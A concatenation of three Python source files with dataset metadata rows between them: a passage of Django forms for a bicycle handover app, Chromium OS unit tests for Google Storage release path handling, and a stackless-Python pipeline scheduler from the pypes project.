return [Field(name, type='hidden', value=trunk(var))]
def get_hidden_fields(candidate_id, event_id, bicycle_id):
return (get_hidden_field('candidate_id', candidate_id) +
get_hidden_field('event_id', event_id) +
get_hidden_field('bicycle_id', bicycle_id))
class DeleteCandidateForm(forms.Form):
event_id = forms.IntegerField(min_value=0, required=False)
bicycle_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
def __init__(self, candidate_id=None, event_id=None, bicycle_id=None,
*args, **kwargs):
super(DeleteCandidateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(*get_hidden_fields(
candidate_id, event_id, bicycle_id))
self.helper.add_input(Submit('submit', 'Delete Candidate',
css_class='col-xs-3 btn-info'))
class InviteCandidateForm(forms.Form):
event_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
invitation_event_id = forms.IntegerField(min_value=0)
def __init__(self, candidate_id=None, event_id=None,
bicycle_id=None, # pylint: disable=unused-argument
*args, **kwargs):
super(InviteCandidateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
if candidate_id:
candidate = get_object_or_404(Candidate, id=candidate_id)
event_choices = [(event.id, date_format(event.due_date,
'DATETIME_FORMAT'))
for event in candidate.events_not_invited_to]
self.fields['invitation_event_id'] = forms.ChoiceField(
choices=event_choices)
layout = [Field('invitation_event_id')]
layout += get_hidden_field('candidate_id', candidate_id)
layout += get_hidden_field('event_id', event_id)
self.helper.layout = Layout(*layout)
self.helper.form_show_labels = False
self.helper.add_input(Submit('submit', 'Submit',
css_class='col-xs-3 btn-info'))
class ModifyCandidateForm(forms.ModelForm):
event_id = forms.IntegerField(min_value=0, required=False)
bicycle_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
class Meta:
model = Candidate
fields = ('first_name', 'last_name', 'date_of_birth',
'event_id', 'bicycle_id', 'candidate_id')
labels = {'first_name': ugettext_lazy('First name'),
'last_name': ugettext_lazy('Last name'),
'date_of_birth': ugettext_lazy('Date of birth')}
widgets = {'date_of_birth': SelectDateOfBirthWidget}
def __init__(self, candidate_id=None, event_id=None, bicycle_id=None,
*args, **kwargs):
super(ModifyCandidateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
if candidate_id:
candidate = get_object_or_404(Candidate, id=candidate_id)
self.initial = {'first_name': candidate.first_name,
'last_name': candidate.last_name,
'date_of_birth': candidate.date_of_birth}
layout = [Layout(Div(Div(Field('first_name'),
Field('last_name'),
Field('date_of_birth'),
css_class="col-xs-12 col-md-8"),
css_class="form-group row"))]
layout += get_hidden_fields(candidate_id, event_id, bicycle_id)
self.helper.layout = Layout(*layout)
self.helper.add_input(Submit('submit', 'Submit',
css_class='col-xs-3 btn-info'))
def clean(self):
cleaned_data = super(ModifyCandidateForm, self).clean()
first_name = cleaned_data.get('first_name')
last_name = cleaned_data.get('last_name')
date_of_birth = cleaned_data.get('date_of_birth')
candidate_id = cleaned_data['candidate_id']
if Candidate.get_matching(
first_name=first_name,
last_name=last_name,
date_of_birth=date_of_birth).exclude(id=candidate_id):
raise ValidationError(MULTIPLE_REGISTRATION_ERROR)
return cleaned_data
class RefundForm(forms.Form):
event_id = forms.IntegerField(min_value=0, required=False)
bicycle_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
def __init__(self, candidate_id=None, event_id=None, bicycle_id=None,
*args, **kwargs):
super(RefundForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(*get_hidden_fields(
candidate_id, event_id, bicycle_id))
self.helper.add_input(Submit('submit', 'Refund bicycle',
css_class='col-xs-3 btn-info'))
class HandoverForm(forms.ModelForm):
event_id = forms.IntegerField(min_value=0, required=False)
bicycle_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
class Meta:
model = Bicycle
fields = ['bicycle_number', 'general_remarks', 'lock_combination',
'color', 'brand', 'event_id', 'candidate_id', 'bicycle_id']
def __init__(self, candidate_id=None, event_id=None, bicycle_id=None,
*args, **kwargs):
super(HandoverForm, self).__init__(*args, **kwargs)
self.fields['general_remarks'].required = False
self.helper = FormHelper()
self.helper.form_method = 'post'
layout = [Field('bicycle_number'),
Field('lock_combination'),
Field('color'),
Field('brand')]
layout += get_hidden_fields(candidate_id, event_id, bicycle_id)
layout += ['general_remarks']
self.helper.layout = Layout(*layout)
self.helper.add_input(Submit('submit', 'Submit',
css_class='col-xs-3 btn-info'))
class EventForm(forms.Form):
due_date = forms.DateTimeField(input_formats=['%d.%m.%Y %H:%M',
'%m/%d/%Y %I:%M %p'])
class InviteForm(forms.Form):
event_id = forms.IntegerField(min_value=0)
choice_1 = forms.IntegerField(min_value=0)
choice_2 = forms.IntegerField(min_value=0)
choice_3 = forms.IntegerField(min_value=0)
choice_4 = forms.IntegerField(min_value=0)
| gpl-3.0 | -8,928,223,286,084,313,000 | 37.244635 | 79 | 0.574683 | false | 3.847582 | false | false | false |
endlessm/chromium-browser | third_party/chromite/lib/paygen/gspaths_unittest.py | 1 | 24292 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Test gspaths library."""
from __future__ import print_function
from chromite.lib import cros_test_lib
from chromite.lib.paygen import gspaths
class GsPathsDataTest(cros_test_lib.TestCase):
"""Tests for structs defined in GsPaths."""
def testBuild(self):
default_input = {
'channel': 'foo-channel',
'board': 'board-name',
'version': '1.2.3',
}
default_expected = {
'bucket': None,
'channel': 'foo-channel',
'board': 'board-name',
'version': '1.2.3',
'uri': None,
}
expected_str = ("Build definition (board='board-name',"
" version='1.2.3', channel='foo-channel')")
build = gspaths.Build(default_input)
self.assertEqual(build, default_expected)
self.assertEqual(expected_str, str(build))
class GsPathsChromeosReleasesTest(cros_test_lib.TestCase):
"""Tests for gspaths.ChromeosReleases."""
# Standard Chrome OS releases names.
_CHROMEOS_RELEASES_BUCKET = 'chromeos-releases'
# Google Storage path, image and payload name base templates.
_GS_BUILD_PATH_TEMPLATE = 'gs://%(bucket)s/%(channel)s/%(board)s/%(version)s'
_IMAGE_NAME_TEMPLATE = (
'chromeos_%(image_version)s_%(board)s_%(signed_image_type)s_'
'%(image_channel)s_%(key)s.bin')
_UNSIGNED_IMAGE_ARCHIVE_NAME_TEMPLATE = (
'ChromeOS-%(unsigned_image_type)s-%(milestone)s-%(image_version)s-'
'%(board)s.tar.xz')
_FULL_PAYLOAD_NAME_TEMPLATE = (
'chromeos_%(image_version)s_%(board)s_%(image_channel)s_full_%(key)s.bin-'
'%(random_str)s.signed')
_DELTA_PAYLOAD_NAME_TEMPLATE = (
'chromeos_%(src_version)s-%(image_version)s_%(board)s_%(image_channel)s_'
'delta_%(key)s.bin-%(random_str)s.signed')
_FULL_DLC_PAYLOAD_NAME_TEMPLATE = (
'dlc_%(dlc_id)s_%(dlc_package)s_%(image_version)s_%(board)s_'
'%(image_channel)s_full.bin-%(random_str)s.signed')
_UNSIGNED_FULL_PAYLOAD_NAME_TEMPLATE = (
'chromeos_%(image_version)s_%(board)s_%(image_channel)s_full_'
'%(unsigned_image_type)s.bin-%(random_str)s')
_UNSIGNED_DELTA_PAYLOAD_NAME_TEMPLATE = (
'chromeos_%(src_version)s-%(image_version)s_%(board)s_%(image_channel)s_'
'delta_%(unsigned_image_type)s.bin-%(random_str)s')
# Compound templates.
_GS_IMAGE_PATH_TEMPLATE = '/'.join(
(_GS_BUILD_PATH_TEMPLATE, _IMAGE_NAME_TEMPLATE))
_GS_UNSIGNED_IMAGE_ARCHIVE_PATH_TEMPLATE = '/'.join(
(_GS_BUILD_PATH_TEMPLATE, _UNSIGNED_IMAGE_ARCHIVE_NAME_TEMPLATE))
_GS_PAYLOADS_PATH_TEMPLATE = '/'.join((_GS_BUILD_PATH_TEMPLATE, 'payloads'))
_GS_PAYLOADS_SIGNING_PATH_TEMPLATE = '/'.join((_GS_BUILD_PATH_TEMPLATE,
'payloads', 'signing'))
_GS_FULL_PAYLOAD_PATH_TEMPLATE = '/'.join(
(_GS_PAYLOADS_PATH_TEMPLATE, _FULL_PAYLOAD_NAME_TEMPLATE))
_GS_DELTA_PAYLOAD_PATH_TEMPLATE = '/'.join(
(_GS_PAYLOADS_PATH_TEMPLATE, _DELTA_PAYLOAD_NAME_TEMPLATE))
_GS_FULL_DLC_PAYLOAD_PATH_TEMPLATE = '/'.join(
(_GS_PAYLOADS_PATH_TEMPLATE, 'dlc', '%(dlc_id)s', '%(dlc_package)s',
_FULL_DLC_PAYLOAD_NAME_TEMPLATE))
def setUp(self):
# Shared attributes (signed + unsigned images).
self.bucket = 'crt'
self.channel = 'foo-channel'
self.board = 'board-name'
self.version = '1.2.3'
self.build = gspaths.Build(bucket=self.bucket, channel=self.channel,
board=self.board, version=self.version)
self.release_build = gspaths.Build(bucket=self._CHROMEOS_RELEASES_BUCKET,
channel=self.channel, board=self.board,
version=self.version)
# Attributes for DLC.
self.dlc_id = 'dummy-dlc'
self.dlc_package = 'dummy-package'
# Signed image attributes.
self.key = 'mp-v3'
self.signed_image_type = 'base'
# Unsigned (test) image attributes.
self.milestone = 'R12'
self.unsigned_image_type = 'test'
# Attributes used for payload testing.
self.src_version = '1.1.1'
self.random_str = '1234567890'
self.src_build = gspaths.Build(bucket=self.bucket, channel=self.channel,
board=self.board, version=self.src_version)
# Dictionaries for populating templates.
self.image_attrs = dict(
bucket=self.bucket,
channel=self.channel,
image_channel=self.channel,
board=self.board,
version=self.version,
image_version=self.version,
key=self.key,
signed_image_type=self.signed_image_type)
self.unsigned_image_archive_attrs = dict(
bucket=self.bucket,
channel=self.channel,
image_channel=self.channel,
board=self.board,
version=self.version,
image_version=self.version,
milestone=self.milestone,
unsigned_image_type=self.unsigned_image_type)
self.all_attrs = dict(self.image_attrs,
src_version=self.src_version,
random_str=self.random_str,
**self.unsigned_image_archive_attrs)
def _Populate(self, template, **kwargs):
"""Populates a template string with override attributes.
This will use the default test attributes to populate a given string
template. It will further override default field values with the values
provided by the optional named arguments.
Args:
template: a string with named substitution fields
kwargs: named attributes to override the defaults
"""
attrs = dict(self.all_attrs, **kwargs)
return template % attrs
def _PopulateGsPath(self, base_path, suffix=None, **kwargs):
"""Populates a Google Storage path template w/ optional suffix.
Args:
base_path: a path string template with named substitution fields
suffix: a path suffix to append to the given base path
kwargs: named attributes to override the defaults
"""
template = base_path
if suffix:
template += '/' + suffix
return self._Populate(template, **kwargs)
def testBuildUri(self):
self.assertEqual(
gspaths.ChromeosReleases.BuildUri(self.build),
self._PopulateGsPath(self._GS_BUILD_PATH_TEMPLATE))
def testBuildPayloadsUri(self):
self.assertEqual(
gspaths.ChromeosReleases.BuildPayloadsUri(self.build),
self._PopulateGsPath(self._GS_PAYLOADS_PATH_TEMPLATE))
def testBuildPayloadsSigningUri(self):
self.assertEqual(
gspaths.ChromeosReleases.BuildPayloadsSigningUri(self.build),
self._PopulateGsPath(self._GS_PAYLOADS_SIGNING_PATH_TEMPLATE))
self.assertEqual(
gspaths.ChromeosReleases.BuildPayloadsFlagUri(
self.build, gspaths.ChromeosReleases.LOCK),
self._PopulateGsPath(self._GS_PAYLOADS_PATH_TEMPLATE,
suffix='LOCK_flag'))
def testImageName(self):
self.assertEqual(
gspaths.ChromeosReleases.ImageName(self.channel,
self.board,
self.version,
self.key,
self.signed_image_type),
self._Populate(self._IMAGE_NAME_TEMPLATE))
def testDLCImageName(self):
self.assertEqual(gspaths.ChromeosReleases.DLCImageName(), 'dlc.img')
def testUnsignedImageArchiveName(self):
self.assertEqual(
gspaths.ChromeosReleases.UnsignedImageArchiveName(
self.board,
self.version,
self.milestone,
self.unsigned_image_type),
self._Populate(self._UNSIGNED_IMAGE_ARCHIVE_NAME_TEMPLATE))
def testImageUri(self):
self.assertEqual(
gspaths.ChromeosReleases.ImageUri(self.build, self.key,
self.signed_image_type),
self._Populate(self._GS_IMAGE_PATH_TEMPLATE))
def testUnsignedImageUri(self):
self.assertEqual(
gspaths.ChromeosReleases.UnsignedImageUri(self.build, self.milestone,
self.unsigned_image_type),
self._Populate(self._GS_UNSIGNED_IMAGE_ARCHIVE_PATH_TEMPLATE))
@staticmethod
def _IncrementVersion(version, inc_amount=1):
version_part = version.rpartition('.')
return '.'.join((version_part[0], str(int(version_part[2]) + inc_amount)))
def testParseImageUri(self):
npo_version = self._IncrementVersion(self.version)
npo_channel = 'nplusone-channel'
basic_dict = dict(self.image_attrs)
npo_dict = dict(self.image_attrs,
bucket=self._CHROMEOS_RELEASES_BUCKET,
image_version=npo_version,
image_channel=npo_channel)
basic_dict['uri'] = uri_basic = self._GS_IMAGE_PATH_TEMPLATE % basic_dict
npo_dict['uri'] = uri_npo = self._GS_IMAGE_PATH_TEMPLATE % npo_dict
expected_basic = gspaths.Image(build=self.build,
image_type=self.signed_image_type,
key=self.key,
uri=uri_basic)
expected_basic_str = gspaths.ChromeosReleases.ImageName(
expected_basic.build.channel, expected_basic.build.board,
expected_basic.build.version, expected_basic.key,
expected_basic.image_type)
expected_npo = gspaths.Image(build=self.release_build,
key=self.key,
image_type=self.signed_image_type,
image_channel=npo_channel,
image_version=npo_version,
uri=uri_npo)
expected_npo_str = gspaths.ChromeosReleases.ImageName(
expected_npo.image_channel, expected_npo.build.board,
expected_npo.image_version, expected_npo.key, expected_npo.image_type)
basic_image = gspaths.ChromeosReleases.ParseImageUri(uri_basic)
self.assertEqual(basic_image, expected_basic)
self.assertEqual(str(basic_image), expected_basic_str)
npo_image = gspaths.ChromeosReleases.ParseImageUri(uri_npo)
self.assertEqual(npo_image, expected_npo)
self.assertEqual(str(npo_image), expected_npo_str)
signer_output = ('gs://chromeos-releases/dev-channel/link/4537.7.0/'
'chromeos_4537.7.1_link_recovery_nplusone-channel_'
'mp-v4.bin.1.payload.hash.update_signer.signed.bin')
bad_image = gspaths.ChromeosReleases.ParseImageUri(signer_output)
self.assertEqual(bad_image, None)
def testParseDLCImageUri(self):
image_uri = ('gs://chromeos-releases/foo-channel/board-name/1.2.3/dlc/'
'%s/%s/%s') % (self.dlc_id, self.dlc_package,
gspaths.ChromeosReleases.DLCImageName())
dlc_image = gspaths.ChromeosReleases.ParseDLCImageUri(image_uri)
expected_dlc_image = gspaths.DLCImage(
build=self.release_build, key=None, uri=image_uri,
dlc_id=self.dlc_id, dlc_package=self.dlc_package,
dlc_image=gspaths.ChromeosReleases.DLCImageName())
self.assertEqual(dlc_image, expected_dlc_image)
def testParseUnsignedImageUri(self):
attr_dict = dict(self.unsigned_image_archive_attrs)
attr_dict['uri'] = uri = (
self._GS_UNSIGNED_IMAGE_ARCHIVE_PATH_TEMPLATE % attr_dict)
expected = gspaths.UnsignedImageArchive(build=self.build,
milestone=self.milestone,
image_type=self.unsigned_image_type,
uri=uri)
expected_str = gspaths.ChromeosReleases.UnsignedImageArchiveName(
expected.build.board, expected.build.version, expected.milestone,
expected.image_type)
image = gspaths.ChromeosReleases.ParseUnsignedImageUri(uri)
self.assertEqual(image, expected)
self.assertEqual(str(image), expected_str)
def testPayloadNamePreset(self):
full = gspaths.ChromeosReleases.PayloadName(channel=self.channel,
board=self.board,
version=self.version,
key=self.key,
random_str=self.random_str)
delta = gspaths.ChromeosReleases.PayloadName(channel=self.channel,
board=self.board,
version=self.version,
key=self.key,
src_version=self.src_version,
random_str=self.random_str)
full_unsigned = gspaths.ChromeosReleases.PayloadName(
channel=self.channel,
board=self.board,
version=self.version,
random_str=self.random_str,
unsigned_image_type=self.unsigned_image_type)
delta_unsigned = gspaths.ChromeosReleases.PayloadName(
channel=self.channel,
board=self.board,
version=self.version,
src_version=self.src_version,
random_str=self.random_str,
unsigned_image_type=self.unsigned_image_type)
self.assertEqual(full, self._Populate(self._FULL_PAYLOAD_NAME_TEMPLATE))
self.assertEqual(delta, self._Populate(self._DELTA_PAYLOAD_NAME_TEMPLATE))
self.assertEqual(full_unsigned,
self._Populate(self._UNSIGNED_FULL_PAYLOAD_NAME_TEMPLATE))
self.assertEqual(delta_unsigned,
self._Populate(self._UNSIGNED_DELTA_PAYLOAD_NAME_TEMPLATE))
def testPayloadNameRandom(self):
full = gspaths.ChromeosReleases.PayloadName(channel=self.channel,
board=self.board,
version=self.version,
key=self.key)
delta = gspaths.ChromeosReleases.PayloadName(channel=self.channel,
board=self.board,
version=self.version,
key=self.key,
src_version=self.src_version)
# Isolate the actual random string, transplant it in the reference template.
full_random_str = full.split('-')[-1].partition('.')[0]
self.assertEqual(
full,
self._Populate(self._FULL_PAYLOAD_NAME_TEMPLATE,
random_str=full_random_str))
delta_random_str = delta.split('-')[-1].partition('.')[0]
self.assertEqual(
delta,
self._Populate(self._DELTA_PAYLOAD_NAME_TEMPLATE,
random_str=delta_random_str))
def testPayloadDLC(self):
full = gspaths.ChromeosReleases.DLCPayloadName(
channel=self.channel,
board=self.board,
version=self.version,
random_str=self.random_str,
dlc_id=self.dlc_id,
dlc_package=self.dlc_package)
self.assertEqual(full, self._Populate(self._FULL_DLC_PAYLOAD_NAME_TEMPLATE,
dlc_id=self.dlc_id,
dlc_package=self.dlc_package,
random_str=self.random_str))
def testPayloadUri(self):
test_random_channel = 'test_random_channel'
test_max_version = '4.5.6'
test_min_version = '0.12.1.0'
min_full = gspaths.ChromeosReleases.PayloadUri(
build=self.build, random_str=self.random_str, key=self.key)
self.assertEqual(
min_full,
self._Populate(self._GS_FULL_PAYLOAD_PATH_TEMPLATE))
max_full = gspaths.ChromeosReleases.PayloadUri(
build=self.build, random_str=self.random_str, key=self.key,
image_channel=test_random_channel, image_version=test_max_version)
self.assertEqual(
max_full,
self._Populate(self._GS_FULL_PAYLOAD_PATH_TEMPLATE,
image_channel=test_random_channel,
image_version=test_max_version))
min_delta = gspaths.ChromeosReleases.PayloadUri(
build=self.build, random_str=self.random_str, key=self.key,
src_version=test_min_version)
self.assertEqual(
min_delta,
self._Populate(self._GS_DELTA_PAYLOAD_PATH_TEMPLATE,
src_version=test_min_version))
max_delta = gspaths.ChromeosReleases.PayloadUri(
build=self.build, random_str=self.random_str, key=self.key,
image_channel=test_random_channel, image_version=test_max_version,
src_version=test_min_version)
self.assertEqual(
max_delta,
self._Populate(self._GS_DELTA_PAYLOAD_PATH_TEMPLATE,
src_version=test_min_version,
image_version=test_max_version,
image_channel=test_random_channel))
dlc_full = gspaths.ChromeosReleases.DLCPayloadUri(
build=self.build, random_str=self.random_str, dlc_id=self.dlc_id,
dlc_package=self.dlc_package, image_channel=test_random_channel,
image_version=test_max_version)
self.assertEqual(
dlc_full,
self._Populate(self._GS_FULL_DLC_PAYLOAD_PATH_TEMPLATE,
src_version=test_min_version,
image_version=test_max_version,
image_channel=test_random_channel,
dlc_id=self.dlc_id,
dlc_package=self.dlc_package))
def testParsePayloadUri(self):
"""Test gsutils.ChromeosReleases.ParsePayloadUri()."""
image_version = '1.2.4'
full_uri = self._Populate(self._GS_FULL_PAYLOAD_PATH_TEMPLATE)
delta_uri = self._Populate(self._GS_DELTA_PAYLOAD_PATH_TEMPLATE)
max_full_uri = self._Populate(self._GS_FULL_PAYLOAD_PATH_TEMPLATE,
image_channel='image-channel',
image_version=image_version)
max_delta_uri = self._Populate(self._GS_DELTA_PAYLOAD_PATH_TEMPLATE,
image_channel='image-channel',
image_version=image_version)
self.assertDictEqual(
gspaths.ChromeosReleases.ParsePayloadUri(full_uri),
{
'tgt_image': gspaths.Image(build=self.build, key=self.key),
'src_image': None,
'build': self.build,
'uri': full_uri,
'exists': False
})
self.assertDictEqual(
gspaths.ChromeosReleases.ParsePayloadUri(delta_uri),
{
'src_image': gspaths.Image(build=self.src_build),
'tgt_image': gspaths.Image(build=self.build, key=self.key),
'build': self.build,
'uri': delta_uri,
'exists': False
})
self.assertDictEqual(
gspaths.ChromeosReleases.ParsePayloadUri(max_full_uri),
{
'tgt_image': gspaths.Image(build=self.build,
key=self.key,
image_version=image_version,
image_channel='image-channel'),
'src_image': None,
'build': self.build,
'uri': max_full_uri,
'exists': False
})
self.assertDictEqual(
gspaths.ChromeosReleases.ParsePayloadUri(max_delta_uri),
{
'src_image': gspaths.Image(build=self.src_build),
'tgt_image': gspaths.Image(build=self.build,
key=self.key,
image_version=image_version,
image_channel='image-channel'),
'build': self.build,
'uri': max_delta_uri,
'exists': False
})
def testBuildValuesFromUri(self):
"""Tests BuildValuesFromUri"""
exp = (r'^gs://(?P<bucket>.*)/(?P<channel>.*)/(?P<board>.*)/'
r'(?P<version>.*)/chromeos_(?P<image_version>[^_]+)_'
r'(?P=board)_(?P<image_type>[^_]+)_(?P<image_channel>[^_]+)_'
'(?P<key>[^_]+).bin$')
uri = ('gs://chromeos-releases/dev-channel/link/4537.7.0/'
'chromeos_4537.7.1_link_recovery_nplusone-channel_mp-v4.bin')
values = gspaths.Build.BuildValuesFromUri(exp, uri)
self.assertEqual(values, {'build': gspaths.Build(bucket='chromeos-releases',
version='4537.7.0',
board='link',
channel='dev-channel'),
'image_version': '4537.7.1',
'image_type': 'recovery',
'image_channel': 'nplusone-channel',
'key': 'mp-v4'})
uri = 'foo-uri'
self.assertIsNone(gspaths.Build.BuildValuesFromUri(exp, uri))
class GsPathsTest(cros_test_lib.TestCase):
"""Test general gspaths utilities."""
def testVersionKey(self):
"""Test VersionKey, especially for new-style versus old-style."""
values = ['1.2.3', '1.2.2', '2.0.0', '1.1.4',
'1.2.3.4', '1.2.3.3', '1.2.4.4', '1.2.4.5', '1.3.3.4',
'0.1.2.3', '0.14.45.32']
sorted_values = sorted(values, key=gspaths.VersionKey)
reverse_sorted_values = sorted(reversed(values), key=gspaths.VersionKey)
expected_values = ['0.1.2.3', '0.14.45.32',
'1.2.3.3', '1.2.3.4', '1.2.4.4', '1.2.4.5', '1.3.3.4',
'1.1.4', '1.2.2', '1.2.3', '2.0.0']
self.assertEqual(sorted_values, expected_values)
self.assertEqual(reverse_sorted_values, expected_values)
def testVersionGreater(self):
"""Test VersionGreater, especially for new-style versus old-style."""
self.assertTrue(gspaths.VersionGreater('1.2.3', '1.2.2'))
self.assertTrue(gspaths.VersionGreater('1.2.3', '1.1.4'))
self.assertTrue(gspaths.VersionGreater('2.0.0', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.2.3', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.2.2', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.1.4', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.2.3', '2.0.0'))
self.assertTrue(gspaths.VersionGreater('1.2.3.4', '1.2.3.3'))
self.assertTrue(gspaths.VersionGreater('1.2.4.4', '1.2.3.4'))
self.assertTrue(gspaths.VersionGreater('1.3.3.4', '1.2.4.5'))
self.assertTrue(gspaths.VersionGreater('2.0.0.0', '1.2.3.4'))
self.assertFalse(gspaths.VersionGreater('1.2.3.4', '1.2.3.4'))
self.assertFalse(gspaths.VersionGreater('1.2.3.3', '1.2.3.4'))
self.assertFalse(gspaths.VersionGreater('1.2.3.4', '1.2.4.4'))
self.assertFalse(gspaths.VersionGreater('1.2.4.5', '1.3.3.4'))
self.assertFalse(gspaths.VersionGreater('1.2.3.4', '2.0.0.0'))
self.assertTrue(gspaths.VersionGreater('1.2.3', '1.2.3.4'))
self.assertTrue(gspaths.VersionGreater('1.2.3', '0.1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.2.3.4', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('0.1.2.3', '1.2.3'))
def testIsImage(self):
a = float(3.14)
self.assertFalse(gspaths.IsImage(a))
b = gspaths.Image()
self.assertTrue(gspaths.IsImage(b))
def testIsUnsignedImageArchive(self):
a = float(3.14)
self.assertFalse(gspaths.IsUnsignedImageArchive(a))
b = gspaths.UnsignedImageArchive()
self.assertTrue(gspaths.IsUnsignedImageArchive(b))
class ImageTest(cros_test_lib.TestCase):
"""Test Image class implementation."""
def setUp(self):
self.build = gspaths.Build(bucket='crt', channel='foo-channel',
board='board-name', version='1.2.3')
def testImage_DefaultImageType(self):
default_image = gspaths.Image(build=self.build)
self.assertEqual('recovery', default_image.image_type)
def testImage_CustomImageType(self):
custom_image_type = 'base'
custom_image = gspaths.Image(build=self.build, image_type=custom_image_type)
self.assertEqual(custom_image_type, custom_image.image_type)
| bsd-3-clause | 1,389,626,597,013,450,800 | 39.895623 | 80 | 0.591223 | false | 3.659536 | true | false | false |
rasata/pypes | core/pypes/scheduler.py | 4 | 2416 | """Provides scheduling routines for stackless tasklets.
The scheduler itself runs as a tasklet. It blocks waiting
for input on the channel passed in. When new data is sent
on this channel, the scheduler wakes and begins processing
of the data.
"""
import stackless
from pype import Pype
from graph import get_pairlist, topsort
import sys
import traceback
def sched(ch, graph):
    """Sits in an infinite loop waiting on the channel to receive data.
The procedure prolog takes care of sorting the
input graph into a dependency list and initializing
the filter tasklets used to construct the graph.
@param graph: The graph representing the work flow
@type graph: Python dict organized as a graph struct
@param ch: The stackless channel to listen on
@type ch: stackless.channel
@return: nothing
"""
edgeList = get_pairlist(graph)
nodes = topsort(edgeList)
tasks = []
inputEdge = Pype()
for n in nodes:
# start this microthread
tasks.append(stackless.tasklet(n.run)())
try:
            # get this node's outputs
edges = graph[n]
except:
pass
else:
# for each output
for e in edges:
e1 = Pype()
# does this port exist
if not n.has_port(edges[e][0]):
print 'Trying to connect undefined output port', n, edges[e][0]
sys.exit(1)
n.connect_output(edges[e][0], e1)
# does this port exist
if not e.has_port(edges[e][1]):
print 'Trying to connect undefined input port', e, edges[e][1]
sys.exit(1)
e.connect_input(edges[e][1], e1)
# Added so that incoming data is fed to every input adapter
# should check if in exists and create it if it doesn't
# because a user could remove the input port by accident
inputEdges = []
for n in nodes:
if n.get_type() == 'ADAPTER':
ie = Pype()
n.connect_input('in', ie)
inputEdges.append(ie)
#nodes[0].connect_input('in', inputEdge)
while True:
data = ch.receive()
for ie in inputEdges:
ie.send(data)
#inputEdge.send(data)
try:
tasks[0].run()
except:
traceback.print_exc()
| apache-2.0 | 6,316,725,766,573,957,000 | 29.2 | 83 | 0.580298 | false | 4.144082 | false | false | false |